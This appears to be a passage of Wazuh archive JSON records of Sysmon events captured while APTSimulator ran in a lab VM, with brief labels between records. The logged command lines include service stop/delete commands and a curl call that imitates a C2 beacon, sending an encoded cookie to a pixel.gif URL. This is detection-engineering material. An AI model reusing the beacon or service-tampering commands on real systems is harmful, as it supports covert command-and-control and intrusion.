tbbd05\",\"currentDirectory\":\"C:\\\\\\\\Users\\\\\\\\vagrant\\\\\\\\simulator\\\\\\\\APTSimulator\\\\\\\\\",\"user\":\"DESKTOP-VAEP8K1\\\\\\\\vagrant\",\"logonGuid\":\"{c64152da-7fad-625e-acb1-050000000000}\",\"logonId\":\"0x5b1ac\",\"terminalSessionId\":\"1\",\"integrityLevel\":\"High\",\"hashes\":\"SHA1=B4979A9F970029889713D756C3F123643DDE73DA,MD5=3FB5CF71F7E7EB49790CB0E663434D80,SHA256=41F067C3A11B02FE39947F9EBA68AE5C7CB5BD1872A6009A4CD1506554A9ABA9,IMPHASH=803254E010814E69947095A2725B2AFD\",\"parentProcessGuid\":\"{c64152da-8ec8-625e-8a02-000000000c00}\",\"parentProcessId\":\"8976\",\"parentImage\":\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\",\"parentCommandLine\":\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\cmd.exe\\\\\\\"\",\"parentUser\":\"DESKTOP-VAEP8K1\\\\\\\\vagrant\"}}}",
"input": {
"type": "log"
},
"@timestamp": "2022-04-20T11:55:45.611Z",
"location": "EventChannel",
"id": "1650455745.942410",
"timestamp": "2022-04-20T11:55:45.611+0000"
},
"fields": {
"@timestamp": [
"2022-04-20T11:55:45.611Z"
],
"timestamp": [
"2022-04-20T11:55:45.611Z"
]
},
"highlight": {
"agent.id": [
"@kibana-highlighted-field@001@/kibana-highlighted-field@"
]
},
"sort": [
1650455745611
]
}
Service stopped
{
"_index": "wazuh-archives-4.x-2022.04.20",
"_type": "_doc",
"_id": "yF3URoABWZBNLY4mG7yu",
"_version": 1,
"_score": null,
"_source": {
"agent": {
"ip": "10.0.2.15",
"name": "DESKTOP-VAEP8K1",
"id": "001"
},
"manager": {
"name": "ubuntu-focal"
},
"data": {
"win": {
"eventdata": {
"originalFileName": "sc.exe",
"image": "C:\\\\Windows\\\\System32\\\\sc.exe",
"product": "Microsoft® Windows® Operating System",
"parentProcessGuid": "{c64152da-8ec8-625e-8a02-000000000c00}",
"description": "Service Control Manager Configuration Tool",
"logonGuid": "{c64152da-7fad-625e-acb1-050000000000}",
"parentCommandLine": "\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"",
"processGuid": "{c64152da-f4a4-625f-af05-000000000c00}",
"logonId": "0x5b1ac",
"parentProcessId": "8976",
"processId": "7452",
"currentDirectory": "C:\\\\Users\\\\vagrant\\\\simulator\\\\APTSimulator\\\\",
"utcTime": "2022-04-20 11:55:16.384",
"hashes": "SHA1=B4979A9F970029889713D756C3F123643DDE73DA,MD5=3FB5CF71F7E7EB49790CB0E663434D80,SHA256=41F067C3A11B02FE39947F9EBA68AE5C7CB5BD1872A6009A4CD1506554A9ABA9,IMPHASH=803254E010814E69947095A2725B2AFD",
"parentImage": "C:\\\\Windows\\\\System32\\\\cmd.exe",
"ruleName": "technique_id=T1059,technique_name=Command-Line Interface",
"company": "Microsoft Corporation",
"commandLine": "sc stop tbbd05",
"integrityLevel": "High",
"fileVersion": "10.0.19041.1 (WinBuild.160101.0800)",
"user": "DESKTOP-VAEP8K1\\\\vagrant",
"terminalSessionId": "1",
"parentUser": "DESKTOP-VAEP8K1\\\\vagrant"
},
"system": {
"eventID": "1",
"keywords": "0x8000000000000000",
"providerGuid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}",
"level": "4",
"channel": "Microsoft-Windows-Sysmon/Operational",
"opcode": "0",
"message": "\"Process Create:\r\nRuleName: technique_id=T1059,technique_name=Command-Line Interface\r\nUtcTime: 2022-04-20 11:55:16.384\r\nProcessGuid: {c64152da-f4a4-625f-af05-000000000c00}\r\nProcessId: 7452\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.19041.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: sc stop tbbd05 \r\nCurrentDirectory: C:\\Users\\vagrant\\simulator\\APTSimulator\\\r\nUser: DESKTOP-VAEP8K1\\vagrant\r\nLogonGuid: {c64152da-7fad-625e-acb1-050000000000}\r\nLogonId: 0x5B1AC\r\nTerminalSessionId: 1\r\nIntegrityLevel: High\r\nHashes: SHA1=B4979A9F970029889713D756C3F123643DDE73DA,MD5=3FB5CF71F7E7EB49790CB0E663434D80,SHA256=41F067C3A11B02FE39947F9EBA68AE5C7CB5BD1872A6009A4CD1506554A9ABA9,IMPHASH=803254E010814E69947095A2725B2AFD\r\nParentProcessGuid: {c64152da-8ec8-625e-8a02-000000000c00}\r\nParentProcessId: 8976\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: \"C:\\Windows\\system32\\cmd.exe\" \r\nParentUser: DESKTOP-VAEP8K1\\vagrant\"",
"version": "5",
"systemTime": "2022-04-20T11:55:16.3877656Z",
"eventRecordID": "5659",
"threadID": "5384",
"computer": "DESKTOP-VAEP8K1",
"task": "1",
"processID": "5964",
"severityValue": "INFORMATION",
"providerName": "Microsoft-Windows-Sysmon"
}
}
},
"decoder": {
"name": "windows_eventchannel"
},
"full_log": "{\"win\":{\"system\":{\"providerName\":\"Microsoft-Windows-Sysmon\",\"providerGuid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\",\"eventID\":\"1\",\"version\":\"5\",\"level\":\"4\",\"task\":\"1\",\"opcode\":\"0\",\"keywords\":\"0x8000000000000000\",\"systemTime\":\"2022-04-20T11:55:16.3877656Z\",\"eventRecordID\":\"5659\",\"processID\":\"5964\",\"threadID\":\"5384\",\"channel\":\"Microsoft-Windows-Sysmon/Operational\",\"computer\":\"DESKTOP-VAEP8K1\",\"severityValue\":\"INFORMATION\",\"message\":\"\\\"Process Create:\\r\\nRuleName: technique_id=T1059,technique_name=Command-Line Interface\\r\\nUtcTime: 2022-04-20 11:55:16.384\\r\\nProcessGuid: {c64152da-f4a4-625f-af05-000000000c00}\\r\\nProcessId: 7452\\r\\nImage: C:\\\\Windows\\\\System32\\\\sc.exe\\r\\nFileVersion: 10.0.19041.1 (WinBuild.160101.0800)\\r\\nDescription: Service Control Manager Configuration Tool\\r\\nProduct: Microsoft® Windows® Operating System\\r\\nCompany: Microsoft Corporation\\r\\nOriginalFileName: sc.exe\\r\\nCommandLine: sc stop tbbd05 \\r\\nCurrentDirectory: C:\\\\Users\\\\vagrant\\\\simulator\\\\APTSimulator\\\\\\r\\nUser: DESKTOP-VAEP8K1\\\\vagrant\\r\\nLogonGuid: {c64152da-7fad-625e-acb1-050000000000}\\r\\nLogonId: 0x5B1AC\\r\\nTerminalSessionId: 1\\r\\nIntegrityLevel: High\\r\\nHashes: SHA1=B4979A9F970029889713D756C3F123643DDE73DA,MD5=3FB5CF71F7E7EB49790CB0E663434D80,SHA256=41F067C3A11B02FE39947F9EBA68AE5C7CB5BD1872A6009A4CD1506554A9ABA9,IMPHASH=803254E010814E69947095A2725B2AFD\\r\\nParentProcessGuid: {c64152da-8ec8-625e-8a02-000000000c00}\\r\\nParentProcessId: 8976\\r\\nParentImage: C:\\\\Windows\\\\System32\\\\cmd.exe\\r\\nParentCommandLine: \\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\" \\r\\nParentUser: DESKTOP-VAEP8K1\\\\vagrant\\\"\"},\"eventdata\":{\"ruleName\":\"technique_id=T1059,technique_name=Command-Line Interface\",\"utcTime\":\"2022-04-20 11:55:16.384\",\"processGuid\":\"{c64152da-f4a4-625f-af05-000000000c00}\",\"processId\":\"7452\",\"image\":\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\sc.exe\",\"fileVersion\":\"10.0.19041.1 (WinBuild.160101.0800)\",\"description\":\"Service Control Manager Configuration Tool\",\"product\":\"Microsoft® Windows® Operating System\",\"company\":\"Microsoft Corporation\",\"originalFileName\":\"sc.exe\",\"commandLine\":\"sc stop tbbd05\",\"currentDirectory\":\"C:\\\\\\\\Users\\\\\\\\vagrant\\\\\\\\simulator\\\\\\\\APTSimulator\\\\\\\\\",\"user\":\"DESKTOP-VAEP8K1\\\\\\\\vagrant\",\"logonGuid\":\"{c64152da-7fad-625e-acb1-050000000000}\",\"logonId\":\"0x5b1ac\",\"terminalSessionId\":\"1\",\"integrityLevel\":\"High\",\"hashes\":\"SHA1=B4979A9F970029889713D756C3F123643DDE73DA,MD5=3FB5CF71F7E7EB49790CB0E663434D80,SHA256=41F067C3A11B02FE39947F9EBA68AE5C7CB5BD1872A6009A4CD1506554A9ABA9,IMPHASH=803254E010814E69947095A2725B2AFD\",\"parentProcessGuid\":\"{c64152da-8ec8-625e-8a02-000000000c00}\",\"parentProcessId\":\"8976\",\"parentImage\":\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\",\"parentCommandLine\":\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\cmd.exe\\\\\\\"\",\"parentUser\":\"DESKTOP-VAEP8K1\\\\\\\\vagrant\"}}}",
"input": {
"type": "log"
},
"@timestamp": "2022-04-20T11:55:45.616Z",
"location": "EventChannel",
"id": "1650455745.942410",
"timestamp": "2022-04-20T11:55:45.616+0000"
},
"fields": {
"@timestamp": [
"2022-04-20T11:55:45.616Z"
],
"timestamp": [
"2022-04-20T11:55:45.616Z"
]
},
"highlight": {
"agent.id": [
"@kibana-highlighted-field@001@/kibana-highlighted-field@"
]
},
"sort": [
1650455745616
]
}
Service deleted.
{
"_index": "wazuh-archives-4.x-2022.04.20",
"_type": "_doc",
"_id": "yV3URoABWZBNLY4mG7yu",
"_version": 1,
"_score": null,
"_source": {
"agent": {
"ip": "10.0.2.15",
"name": "DESKTOP-VAEP8K1",
"id": "001"
},
"manager": {
"name": "ubuntu-focal"
},
"data": {
"win": {
"eventdata": {
"originalFileName": "sc.exe",
"image": "C:\\\\Windows\\\\System32\\\\sc.exe",
"product": "Microsoft® Windows® Operating System",
"parentProcessGuid": "{c64152da-8ec8-625e-8a02-000000000c00}",
"description": "Service Control Manager Configuration Tool",
"logonGuid": "{c64152da-7fad-625e-acb1-050000000000}",
"parentCommandLine": "\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"",
"processGuid": "{c64152da-f4a4-625f-b005-000000000c00}",
"logonId": "0x5b1ac",
"parentProcessId": "8976",
"processId": "2784",
"currentDirectory": "C:\\\\Users\\\\vagrant\\\\simulator\\\\APTSimulator\\\\",
"utcTime": "2022-04-20 11:55:16.428",
"hashes": "SHA1=B4979A9F970029889713D756C3F123643DDE73DA,MD5=3FB5CF71F7E7EB49790CB0E663434D80,SHA256=41F067C3A11B02FE39947F9EBA68AE5C7CB5BD1872A6009A4CD1506554A9ABA9,IMPHASH=803254E010814E69947095A2725B2AFD",
"parentImage": "C:\\\\Windows\\\\System32\\\\cmd.exe",
"ruleName": "technique_id=T1059,technique_name=Command-Line Interface",
"company": "Microsoft Corporation",
"commandLine": "sc delete tbbd05",
"integrityLevel": "High",
"fileVersion": "10.0.19041.1 (WinBuild.160101.0800)",
"user": "DESKTOP-VAEP8K1\\\\vagrant",
"terminalSessionId": "1",
"parentUser": "DESKTOP-VAEP8K1\\\\vagrant"
},
"system": {
"eventID": "1",
"keywords": "0x8000000000000000",
"providerGuid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}",
"level": "4",
"channel": "Microsoft-Windows-Sysmon/Operational",
"opcode": "0",
"message": "\"Process Create:\r\nRuleName: technique_id=T1059,technique_name=Command-Line Interface\r\nUtcTime: 2022-04-20 11:55:16.428\r\nProcessGuid: {c64152da-f4a4-625f-b005-000000000c00}\r\nProcessId: 2784\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.19041.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: sc delete tbbd05 \r\nCurrentDirectory: C:\\Users\\vagrant\\simulator\\APTSimulator\\\r\nUser: DESKTOP-VAEP8K1\\vagrant\r\nLogonGuid: {c64152da-7fad-625e-acb1-050000000000}\r\nLogonId: 0x5B1AC\r\nTerminalSessionId: 1\r\nIntegrityLevel: High\r\nHashes: SHA1=B4979A9F970029889713D756C3F123643DDE73DA,MD5=3FB5CF71F7E7EB49790CB0E663434D80,SHA256=41F067C3A11B02FE39947F9EBA68AE5C7CB5BD1872A6009A4CD1506554A9ABA9,IMPHASH=803254E010814E69947095A2725B2AFD\r\nParentProcessGuid: {c64152da-8ec8-625e-8a02-000000000c00}\r\nParentProcessId: 8976\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: \"C:\\Windows\\system32\\cmd.exe\" \r\nParentUser: DESKTOP-VAEP8K1\\vagrant\"",
"version": "5",
"systemTime": "2022-04-20T11:55:16.4304007Z",
"eventRecordID": "5660",
"threadID": "5384",
"computer": "DESKTOP-VAEP8K1",
"task": "1",
"processID": "5964",
"severityValue": "INFORMATION",
"providerName": "Microsoft-Windows-Sysmon"
}
}
},
"decoder": {
"name": "windows_eventchannel"
},
"full_log": "{\"win\":{\"system\":{\"providerName\":\"Microsoft-Windows-Sysmon\",\"providerGuid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\",\"eventID\":\"1\",\"version\":\"5\",\"level\":\"4\",\"task\":\"1\",\"opcode\":\"0\",\"keywords\":\"0x8000000000000000\",\"systemTime\":\"2022-04-20T11:55:16.4304007Z\",\"eventRecordID\":\"5660\",\"processID\":\"5964\",\"threadID\":\"5384\",\"channel\":\"Microsoft-Windows-Sysmon/Operational\",\"computer\":\"DESKTOP-VAEP8K1\",\"severityValue\":\"INFORMATION\",\"message\":\"\\\"Process Create:\\r\\nRuleName: technique_id=T1059,technique_name=Command-Line Interface\\r\\nUtcTime: 2022-04-20 11:55:16.428\\r\\nProcessGuid: {c64152da-f4a4-625f-b005-000000000c00}\\r\\nProcessId: 2784\\r\\nImage: C:\\\\Windows\\\\System32\\\\sc.exe\\r\\nFileVersion: 10.0.19041.1 (WinBuild.160101.0800)\\r\\nDescription: Service Control Manager Configuration Tool\\r\\nProduct: Microsoft® Windows® Operating System\\r\\nCompany: Microsoft Corporation\\r\\nOriginalFileName: sc.exe\\r\\nCommandLine: sc delete tbbd05 \\r\\nCurrentDirectory: C:\\\\Users\\\\vagrant\\\\simulator\\\\APTSimulator\\\\\\r\\nUser: DESKTOP-VAEP8K1\\\\vagrant\\r\\nLogonGuid: {c64152da-7fad-625e-acb1-050000000000}\\r\\nLogonId: 0x5B1AC\\r\\nTerminalSessionId: 1\\r\\nIntegrityLevel: High\\r\\nHashes: SHA1=B4979A9F970029889713D756C3F123643DDE73DA,MD5=3FB5CF71F7E7EB49790CB0E663434D80,SHA256=41F067C3A11B02FE39947F9EBA68AE5C7CB5BD1872A6009A4CD1506554A9ABA9,IMPHASH=803254E010814E69947095A2725B2AFD\\r\\nParentProcessGuid: {c64152da-8ec8-625e-8a02-000000000c00}\\r\\nParentProcessId: 8976\\r\\nParentImage: C:\\\\Windows\\\\System32\\\\cmd.exe\\r\\nParentCommandLine: \\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\" \\r\\nParentUser: DESKTOP-VAEP8K1\\\\vagrant\\\"\"},\"eventdata\":{\"ruleName\":\"technique_id=T1059,technique_name=Command-Line Interface\",\"utcTime\":\"2022-04-20 11:55:16.428\",\"processGuid\":\"{c64152da-f4a4-625f-b005-000000000c00}\",\"processId\":\"2784\",\"image\":\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\sc.exe\",\"fileVersion\":\"10.0.19041.1 (WinBuild.160101.0800)\",\"description\":\"Service Control Manager Configuration Tool\",\"product\":\"Microsoft® Windows® Operating System\",\"company\":\"Microsoft Corporation\",\"originalFileName\":\"sc.exe\",\"commandLine\":\"sc delete tbbd05\",\"currentDirectory\":\"C:\\\\\\\\Users\\\\\\\\vagrant\\\\\\\\simulator\\\\\\\\APTSimulator\\\\\\\\\",\"user\":\"DESKTOP-VAEP8K1\\\\\\\\vagrant\",\"logonGuid\":\"{c64152da-7fad-625e-acb1-050000000000}\",\"logonId\":\"0x5b1ac\",\"terminalSessionId\":\"1\",\"integrityLevel\":\"High\",\"hashes\":\"SHA1=B4979A9F970029889713D756C3F123643DDE73DA,MD5=3FB5CF71F7E7EB49790CB0E663434D80,SHA256=41F067C3A11B02FE39947F9EBA68AE5C7CB5BD1872A6009A4CD1506554A9ABA9,IMPHASH=803254E010814E69947095A2725B2AFD\",\"parentProcessGuid\":\"{c64152da-8ec8-625e-8a02-000000000c00}\",\"parentProcessId\":\"8976\",\"parentImage\":\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\",\"parentCommandLine\":\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\cmd.exe\\\\\\\"\",\"parentUser\":\"DESKTOP-VAEP8K1\\\\\\\\vagrant\"}}}",
"input": {
"type": "log"
},
"@timestamp": "2022-04-20T11:55:45.639Z",
"location": "EventChannel",
"id": "1650455745.942410",
"timestamp": "2022-04-20T11:55:45.639+0000"
},
"fields": {
"@timestamp": [
"2022-04-20T11:55:45.639Z"
],
"timestamp": [
"2022-04-20T11:55:45.639Z"
]
},
"highlight": {
"agent.id": [
"@kibana-highlighted-field@001@/kibana-highlighted-field@"
]
},
"sort": [
1650455745639
]
}
Network req
{
"_index": "wazuh-archives-4.x-2022.04.20",
"_type": "_doc",
"_id": "4l3URoABWZBNLY4mJ7xp",
"_version": 1,
"_score": null,
"_source": {
"agent": {
"ip": "10.0.2.15",
"name": "DESKTOP-VAEP8K1",
"id": "001"
},
"manager": {
"name": "ubuntu-focal"
},
"data": {
"win": {
"eventdata": {
"image": "C:\\\\Users\\\\vagrant\\\\simulator\\\\APTSimulator\\\\helpers\\\\curl.exe",
"parentProcessGuid": "{c64152da-8ec8-625e-8a02-000000000c00}",
"logonGuid": "{c64152da-7fad-625e-acb1-050000000000}",
"parentCommandLine": "\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"",
"processGuid": "{c64152da-f4a7-625f-b505-000000000c00}",
"logonId": "0x5b1ac",
"parentProcessId": "8976",
"processId": "1476",
"currentDirectory": "C:\\\\Users\\\\vagrant\\\\simulator\\\\APTSimulator\\\\",
"utcTime": "2022-04-20 11:55:19.566",
"hashes": "SHA1=C852A39B2BD53BE2F9CB35CF07D15D176795F47C,MD5=1673A392AAF4278D2084C224A08ABFF1,SHA256=92A112DEEA36D6D4D1BD265E2E4B200129DAB30AFE918115B77A92F68D38903D,IMPHASH=0B669CDDDC01A874708E074B055741F6",
"parentImage": "C:\\\\Windows\\\\System32\\\\cmd.exe",
"ruleName": "technique_id=T1059,technique_name=Command-Line Interface",
"commandLine": "\\\"C:\\\\Users\\\\vagrant\\\\simulator\\\\APTSimulator\\\\\\\\helpers\\\\curl.exe\\\" -s -o /dev/null -I -H \\\"Accept: */*\\\" -H \\\"Cookie: cdoWQelsAYyUlsEMuvbfEAfSxSWtkRwhm5OPfZ6K+400BQBsFlxwSSvsZ2IokquiUDKEPTip7MHL5VkYirf74WkZkc29LeJIt38HQA8E79bc2x9wMgnCz7U5mWXTMZLCQPdoc0VNqbpd2ytuxKRm9upFlCgB41h3hu1GrfDt0Q0=\\\" -A \\\"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; BOIE9;ENUS)\\\" -H \\\"Connection: Keep-Alive\\\" -H \\\"Cache-Control: no-cache\\\" http://10.0.2.15/pixel.gif",
"integrityLevel": "High",
"user": "DESKTOP-VAEP8K1\\\\vagrant",
"terminalSessionId": "1",
"parentUser": "DESKTOP-VAEP8K1\\\\vagrant"
},
"system": {
"eventID": "1",
"keywords": "0x8000000000000000",
"providerGuid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}",
"level": "4",
"channel": "Microsoft-Windows-Sysmon/Operational",
"opcode": "0",
"message": "\"Process Create:\r\nRuleName: technique_id=T1059,technique_name=Command-Line Interface\r\nUtcTime: 2022-04-20 11:55:19.566\r\nProcessGuid: {c64152da-f4a7-625f-b505-000000000c00}\r\nProcessId: 1476\r\nImage: C:\\Users\\vagrant\\simulator\\APTSimulator\\helpers\\curl.exe\r\nFileVersion: -\r\nDescription: -\r\nProduct: -\r\nCompany: -\r\nOriginalFileName: -\r\nCommandLine: \"C:\\Users\\vagrant\\simulator\\APTSimulator\\\\helpers\\curl.exe\" -s -o /dev/null -I -H \"Accept: */*\" -H \"Cookie: cdoWQelsAYyUlsEMuvbfEAfSxSWtkRwhm5OPfZ6K+400BQBsFlxwSSvsZ2IokquiUDKEPTip7MHL5VkYirf74WkZkc29LeJIt38HQA8E79bc2x9wMgnCz7U5mWXTMZLCQPdoc0VNqbpd2ytuxKRm9upFlCgB41h3hu1GrfDt0Q0=\" -A \"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; BOIE9;ENUS)\" -H \"Connection: Keep-Alive\" -H \"Cache-Control: no-cache\" http://10.0.2.15/pixel.gif\r\nCurrentDirectory: C:\\Users\\vagrant\\simulator\\APTSimulator\\\r\nUser: DESKTOP-VAEP8K1\\vagrant\r\nLogonGuid: {c64152da-7fad-625e-acb1-050000000000}\r\nLogonId: 0x5B1AC\r\nTerminalSessionId: 1\r\nIntegrityLevel: High\r\nHashes: SHA1=C852A39B2BD53BE2F9CB35CF07D15D176795F47C,MD5=1673A392AAF4278D2084C224A08ABFF1,SHA256=92A112DEEA36D6D4D1BD265E2E4B200129DAB30AFE918115B77A92F68D38903D,IMPHASH=0B669CDDDC01A874708E074B055741F6\r\nParentProcessGuid: {c64152da-8ec8-625e-8a02-000000000c00}\r\nParentProcessId: 8976\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: \"C:\\Windows\\system32\\cmd.exe\" \r\nParentUser: DESKTOP-VAEP8K1\\vagrant\"",
"version": "5",
"systemTime": "2022-04-20T11:55:19.6088013Z",
"eventRecordID": "5673",
"threadID": "5384",
"computer": "DESKTOP-VAEP8K1",
"task": "1",
"processID": "5964",
"severityValue": "INFORMATION",
"providerName": "Microsoft-Windows-Sysmon"
}
}
},
"decoder": {
"name": "windows_eventchannel"
},
"full_log": "{\"win\":{\"system\":{\"providerName\":\"Microsoft-Windows-Sysmon\",\"providerGuid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\",\"eventID\":\"1\",\"version\":\"5\",\"level\":\"4\",\"task\":\"1\",\"opcode\":\"0\",\"keywords\":\"0x8000000000000000\",\"systemTime\":\"2022-04-20T11:55:19.6088013Z\",\"eventRecordID\":\"5673\",\"processID\":\"5964\",\"threadID\":\"5384\",\"channel\":\"Microsoft-Windows-Sysmon/Operational\",\"computer\":\"DESKTOP-VAEP8K1\",\"severityValue\":\"INFORMATION\",\"message\":\"\\\"Process Create:\\r\\nRuleName: technique_id=T1059,technique_name=Command-Line Interface\\r\\nUtcTime: 2022-04-20 11:55:19.566\\r\\nProcessGuid: {c64152da-f4a7-625f-b505-000000000c00}\\r\\nProcessId: 1476\\r\\nImage: C:\\\\Users\\\\vagrant\\\\simulator\\\\APTSimulator\\\\helpers\\\\curl.exe\\r\\nFileVersion: -\\r\\nDescription: -\\r\\nProduct: -\\r\\nCompany: -\\r\\nOriginalFileName: -\\r\\nCommandLine: \\\"C:\\\\Users\\\\vagrant\\\\simulator\\\\APTSimulator\\\\\\\\helpers\\\\curl.exe\\\" -s -o /dev/null -I -H \\\"Accept: */*\\\" -H \\\"Cookie: cdoWQelsAYyUlsEMuvbfEAfSxSWtkRwhm5OPfZ6K+400BQBsFlxwSSvsZ2IokquiUDKEPTip7MHL5VkYirf74WkZkc29LeJIt38HQA8E79bc2x9wMgnCz7U5mWXTMZLCQPdoc0VNqbpd2ytuxKRm9upFlCgB41h3hu1GrfDt0Q0=\\\" -A \\\"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; BOIE9;ENUS)\\\" -H \\\"Connection: Keep-Alive\\\" -H \\\"Cache-Control: no-cache\\\" http://10.0.2.15/pixel.gif\\r\\nCurrentDirectory: C:\\\\Users\\\\vagrant\\\\simulator\\\\APTSimulator\\\\\\r\\nUser: DESKTOP-VAEP8K1\\\\vagrant\\r\\nLogonGuid: {c64152da-7fad-625e-acb1-050000000000}\\r\\nLogonId: 0x5B1AC\\r\\nTerminalSessionId: 1\\r\\nIntegrityLevel: High\\r\\nHashes: SHA1=C852A39B2BD53BE2F9CB35CF07D15D176795F47C,MD5=1673A392AAF4278D2084C224A08ABFF1,SHA256=92A112DEEA36D6D4D1BD265E2E4B200129DAB30AFE918115B77A92F68D38903D,IMPHASH=0B669CDDDC01A874708E074B055741F6\\r\\nParentProcessGuid: {c64152da-8ec8-625e-8a02-000000000c00}\\r\\nParentProcessId: 8976\\r\\nParentImage: C:\\\\Windows\\\\System32\\\\cmd.exe\\r\\nParentCommandLine: \\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\" \\r\\nParentUser: DESKTOP-VAEP8K1\\\\vagrant\\\"\"},\"eventdata\":{\"ruleName\":\"technique_id=T1059,technique_name=Command-Line Interface\",\"utcTime\":\"2022-04-20 11:55:19.566\",\"processGuid\":\"{c64152da-f4a7-625f-b505-000000000c00}\",\"processId\":\"1476\",\"image\":\"C:\\\\\\\\Users\\\\\\\\vagrant\\\\\\\\simulator\\\\\\\\APTSimulator\\\\\\\\helpers\\\\\\\\curl.exe\",\"commandLine\":\"\\\\\\\"C:\\\\\\\\Users\\\\\\\\vagrant\\\\\\\\simulator\\\\\\\\APTSimulator\\\\\\\\\\\\\\\\helpers\\\\\\\\curl.exe\\\\\\\" -s -o /dev/null -I -H \\\\\\\"Accept: */*\\\\\\\" -H \\\\\\\"Cookie: cdoWQelsAYyUlsEMuvbfEAfSxSWtkRwhm5OPfZ6K+400BQBsFlxwSSvsZ2IokquiUDKEPTip7MHL5VkYirf74WkZkc29LeJIt38HQA8E79bc2x9wMgnCz7U5mWXTMZLCQPdoc0VNqbpd2ytuxKRm9upFlCgB41h3hu1GrfDt0Q0=\\\\\\\" -A \\\\\\\"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; BOIE9;ENUS)\\\\\\\" -H \\\\\\\"Connection: Keep-Alive\\\\\\\" -H \\\\\\\"Cache-Control: no-cache\\\\\\\" http://10.0.2.15/pixel.gif\",\"currentDirectory\":\"C:\\\\\\\\Users\\\\\\\\vagrant\\\\\\\\simulator\\\\\\\\APTSimulator\\\\\\\\\",\"user\":\"DESKTOP-VAEP8K1\\\\\\\\vagrant\",\"logonGuid\":\"{c64152da-7fad-625e-acb1-050000000000}\",\"logonId\":\"0x5b1ac\",\"terminalSessionId\":\"1\",\"integrityLevel\":\"High\",\"hashes\":\"SHA1=C852A39B2BD53BE2F9CB35CF07D15D176795F47C,MD5=1673A392AAF4278D2084C224A08ABFF1,SHA256=92A112DEEA36D6D4D1BD265E2E4B200129DAB30AFE918115B77A92F68D38903D,IMPHASH=0B669CDDDC01A874708E074B055741F6\",\"parentProcessGuid\":\"{c64152da-8ec8-625e-8a02-000000000c00}\",\"parentProcessId\":\"8976\",\"parentImage\":\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\",\"parentCommandLine\":\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\cmd.exe\\\\\\\"\",\"parentUser\":\"DESKTOP-VAEP8K1\\\\\\\\vagrant\"}}}",
"input": {
"type": "log"
},
"@timestamp": "2022-04-20T11:55:47.753Z",
"location": "EventChannel",
"id": "1650455747.951847",
"timestamp": "2022-04-20T11:55:47.753+0000"
},
"fields": {
"@timestamp": [
"2022-04-20T11:55:47.753Z"
],
"timestamp": [
"2022-04-20T11:55:47.753Z"
]
},
"highlight": {
"agent.id": [
"@kibana-highlighted-field@001@/kibana-highlighted-field@"
]
},
"sort": [
1650455747753
]
}
Network request 2
{
"_index": "wazuh-archives-4.x-2022.04.20",
"_type": "_doc",
"_id": "dF3gRoABWZBNLY4mRsPc",
"_version": 1,
"_score": null,
"_source": {
"agent": {
"ip": "10.0.2.15",
"name": "DESKTOP-VAEP8K1",
"id": "001"
},
"manager": {
"name": "ubuntu-focal"
},
"data": {
"win": {
"eventdata": {
"image": "C:\\\\Users\\\\vagrant\\\\simulator\\\\APTSimulator\\\\helpers\\\\curl.exe",
"parentProcessGuid": "{c64152da-8ec8-625e-8a02-000000000c00}",
"logonGuid": "{c64152da-7fad-625e-acb1-050000000000}",
"parentCommandLine": "\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"",
"processGuid": "{c64152da-f7c4-625f-fb05-000000000c00}",
"logonId": "0x5b1ac",
"parentProcessId": "8976",
"processId": "4656",
"currentDirectory": "C:\\\\Users\\\\vagrant\\\\simulator\\\\APTSimulator\\\\",
"utcTime": "2022-04-20 12:08:36.397",
"hashes": "SHA1=C852A39B2BD53BE2F9CB35CF07D15D176795F47C,MD5=1673A392AAF4278D2084C224A08ABFF1,SHA256=92A112DEEA36D6D4D1BD265E2E4B200129DAB30AFE918115B77A92F68D38903D,IMPHASH=0B669CDDDC01A874708E074B055741F6",
"parentImage": "C:\\\\Windows\\\\System32\\\\cmd.exe",
"ruleName": "technique_id=T1059,technique_name=Command-Line Interface",
